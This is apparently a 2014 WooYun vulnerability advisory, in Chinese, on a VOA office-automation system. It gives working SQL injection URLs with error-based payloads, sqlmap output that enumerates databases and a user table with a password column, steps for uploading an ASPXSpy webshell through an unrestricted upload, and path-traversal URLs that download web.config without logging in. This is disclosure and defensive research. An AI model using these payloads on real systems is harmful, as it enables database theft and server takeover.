当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066562

漏洞标题:某OA系统多处SQL注入/任意文件上传GetShell/任意文件下载/信息泄露打包

相关厂商:cncert国家互联网应急中心

漏洞作者: xfkxfk

提交时间:2014-06-28 19:02

修复时间:2014-09-26 19:04

公开时间:2014-09-26 19:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-28: 细节已通知厂商并且等待厂商处理中
2014-07-03: 厂商已经确认,细节仅向厂商公开
2014-07-06: 细节向第三方安全合作伙伴开放
2014-08-27: 细节向核心白帽子及相关领域专家公开
2014-09-06: 细节向普通白帽子公开
2014-09-16: 细节向实习白帽子公开
2014-09-26: 细节向公众公开

简要描述:

某OA系统多处SQL注入可拖库,任意文件上传GetShell,无需登录任意文件下载漏洞打包

详细说明:

官网:http://www.kmpsoft.com/index.htm
VOA协同办公系统
官方案例:http://www.kmpsoft.com/solution.htm
官方案例还是很多的,而且大量政府,事业单位,教育等多个行业。
官方demo地址:http://demo.kmpsoft.com/
0x001 SQL注入漏洞
第一处SQL注入
http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and db_name()>0 -- -
第二处SQL注入
http://demo.kmpsoft.com/Archive/send/send.aspx?mode=3&oid=a8b011b7-e7b7-43df-a162-6ae5523f1494' and db_name()>0 -- -
第三处SQL注入
http://demo.kmpsoft.com/rules/rules.aspx?mode=3&oid=8eeb9c5b-6daa-410f-a90c-f895ad2e7aae' and db_name()>0 -- -
这里以第一处为例:
http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and db_name()>0 -- -

111.png


http://demo.kmpsoft.com/Archive/input/input.aspx?mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' and (select @@version)>0 -- -

222.png


数据库信息如下:

---
Place: GET
Parameter: oid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: mode=3&oid=9ab24289-a8bc-4457-ba88-25bc51592cf3' AND 1359=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1359=1359) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(100)+CHAR(122)+CHAR(113))) AND 'qTcd'='qTcd
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [41]:
[*] a0105132537
[*] a0108141913
[*] a0110103200
[*] a0206163737
[*] a0218231819
[*] a0220011230
[*] a0220171713
[*] a0221141636
[*] a0221171518
[*] a0221213002
[*] a0318150035
[*] a0401093038
[*] a0401230533
[*] a041621560
[*] a04251542211
[*] a0515171406
[*] a0719175457
[*] a0927092040
[*] a0927112531
[*] a1006105224
[*] a1012122304
[*] a1015112018
[*] a1015144816
[*] a1015153226
[*] a1015173249
[*] a1015211359
[*] a1016000522
[*] a1129141738
[*] a1202124725
[*] a1213095801
[*] a1222113403
[*] a1222163828
[*] a1222171342
[*] a1224140353
[*] a1227184632659
[*] a1229110908
[*] a123456700
[*] master
[*] model
[*] msdb
[*] tempdb


当前数据库
Database: a0719175457
[191 tables]
192个表就不依依列出来了,看看myUser表的结构予以证明:

Database: a0719175457
Table: myUser
[28 columns]
+--------------------+------------------+
| Column             | Type             |
+--------------------+------------------+
| ADAccount          | varchar          |
| BUGUID             | uniqueidentifier |
| Comments           | varchar          |
| CreatedBy          | uniqueidentifier |
| CreatedOn          | datetime         |
| DefaultStationGUId | uniqueidentifier |
| DepartmentGUID     | uniqueidentifier |
| DisabledReason     | varchar          |
| Email              | varchar          |
| HomePhone          | varchar          |
| IsAdmin            | bit              |
| IsDisabeld         | bit              |
| IsSaler            | bit              |
| JobNumber          | varchar          |
| JobTitle           | varchar          |
| keyWords           | nvarchar         |
| MobilePhone        | varchar          |
| ModifiedBy         | uniqueidentifier |
| ModifiedOn         | varchar          |
| OfficePhone        | varchar          |
| OrderCode          | nvarchar         |
| ParentGUID         | uniqueidentifier |
| Password           | varchar          |
| PhotoUrl           | varchar          |
| UserCode           | varchar          |
| UserGUID           | uniqueidentifier |
| UserName           | varchar          |
| UserProject        | varchar          |
+--------------------+------------------+


0x002 任意文件上传GetShell
个人办公——个人文件柜——我的文件——新增——附件——上传
这里上传没有做任何限制,直接上传aspx文件
这里我们上传ASPXSpy.apsx文件:

333.png


上传后查看页面源代码得到上传后文件的fileanme=2014628164329.aspx:

444.png


但是不知道上传后的路径,扫一下路径看看有什么upload/uploadfile/等这些目录

4440.png


upfiles访问403,应该就这个目录了,试一下,果然成功了!
shell地址:http://demo.kmpsoft.com/upfiles/2014628164329.aspx

555.png


0x003 无需登录任意文件下载漏洞
这里的任意文件下载无需登录,直接下载,导致系统源代码,系统配置文件,账户信息大量泄漏
http://demo.kmpsoft.com/_controls/upfile/UpFile_Main_Down.aspx?p_docname=UpFile_Main_Down.aspx&p_filename=../_controls/upfile/UpFile_Main_Down.aspx&p_open_type=_blank&random=0.6767177609908288

6661.png


http://demo.kmpsoft.com/_controls/upfile/UpFile_Main_Down.aspx?p_docname=web.config&p_filename=../web.config&p_open_type=_blank&random=0.6767177609908288

6660.png


数据库等敏感信息泄漏

666.png

漏洞证明:

666.png

修复方案:

严格过滤,严格控制上传,控制权限,控制下载文件路径等

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-07-03 11:23

厂商回复:

CNVD确认所述DEMO情况,目前难以找到应用实例情况,已经由CNVD直接联系软件生产厂商,深圳市鹏威信息技术有限公司,电话至0755-8661****(对方称不需要),后将通报发送至网站邮箱market 中处置。

最新状态:

暂无